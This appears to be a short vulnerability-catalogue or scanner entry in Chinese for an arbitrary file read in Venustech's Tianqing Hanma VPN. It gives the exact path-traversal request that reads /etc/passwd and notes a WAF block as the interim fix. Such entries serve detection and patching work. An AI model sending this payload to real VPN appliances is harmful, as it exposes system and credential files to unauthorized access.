vendor = "启明星辰"
name = "天清汉马vpn任意文件读取"
type = "任意文件读取"
version = "未知"
path = "/vpn/user/download/client?ostype=../../../../../../../etc/passwd"
detail = "/vpn/user/download/client?ostype=../../../../../../../etc/passwd"
fix = "WAF封禁路径，等待发布补丁"
date = "0724"
label = "nday"
